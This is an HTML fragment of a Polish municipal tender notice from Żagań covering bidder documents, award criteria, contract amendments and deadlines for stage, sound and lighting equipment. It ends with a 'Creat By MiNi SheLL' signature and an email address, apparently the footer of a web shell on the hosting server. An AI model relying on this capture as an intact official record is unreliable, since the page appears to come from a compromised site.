<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokumenty, jakie muszą dostarczyć wykonawcy w celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego( dotyczą  urządzeń nagłaśniających i oświetleniowych ) :  
- certyfikaty,  atesty PZH lub 
- inne dokumenty stwierdzające zgodność wyrobu z określonymi przepisami lub normami 
  (aprobaty techniczne, deklaracje zgodności) 
- karty katalogowe.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Poglądowy kosztorys ofertowy 
 z wyszczególnieniem kosztów : scena z osprzętem, nagłośnienie, oświetlenie, okratowanie, okurtynowanie sumarycznie.
2. Wykaz urządzeń oświetleniowych i nagłośnieniowych, wyszczególniając: nazwę, parametry, producenta,  cenę, każdego z osobna urządzenia oświetleniowego i nagłośnieniowego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres udzielonej gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający - na podstawie art.144 ust.1 i 2 Ustawy Prawo zamówień publicznych dopuszcza możliwość   zmian postanowień zawartej umowy w stosunku do treści oferty  na podstawie, której dokonano wyboru Wykonawcy w następującym zakresie  : 
1) zmiana nazw, siedziby stron umowy, numerów kont bankowych, innych danych
     identyfikacyjnych; 
     2) zmiana podwykonawcy pod warunkiem odpowiedniego zgłoszenia i po akceptacji 
         przez  Zamawiającego;
3) zmniejszenie zakresu wynagrodzenia z przyczyn o obiektywnym charakterze, istotnej 
    zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie 
    leży w interesie publicznym, czego nie można było przewidzieć w chwili jej zawarcia; 
     4) zmiana warunków dot. terminów płatności, 
     5) zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie 
         dostosowanie treści umowy do aktualnego stanu prawnego, w tym np. podatku VAT,
     6) wydłużenia terminu obowiązywania umowy, pod warunkiem  że:  
         a) prace objęte umową o wykonanie usługi  zostały wstrzymane przez właściwe organy
              z przyczyn niezależnych od Wykonawcy, 
         b)  zachodzi konieczność wykonania zamówień dodatkowych, nieobjętych 
                i nieprzekraczających łącznie 50% wartości realizowanego zamówienia, 
                niezbędnych do jego prawidłowego wykonania, których wykonanie stało się 
                konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia jeżeli z 
                przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego 
               od zamówienia podstawowego wymagałoby poniesienia niewspółmiernie wysokich 
               kosztów lub wykonanie zamówienia  podstawowego jest uzależnione od 
               wykonania zamówienia dodatkowego, a  których wykonanie w sposób obiektywny 
               uniemożliwia  terminowe zakończenie realizacji przedmiotu zamówienia.  
        Okres przesunięcia terminu zakończenia prac  równy będzie okresowi przerwy lub 
        postoju;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.zagan.pl         w BIP-ie  zakładaka przyetargi publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> na pisemny wniosek Wykonawcy 
Urząd Miasta Żagań, ul. Jana Pawła II nr 15 , pok. nr 20, Wydział Zamówień Publicznych i Nadzoru Właścicielskiego, 68-100 Żagań.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2015 godzina 11:00, miejsce: Urząd Miasta Żagań ul. JANA PAWŁA II  nr 15, pok. nr 20,  68-100 Żagań 
Wydział Zamówień Publicznych i Nadzoru Właścicielskiego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com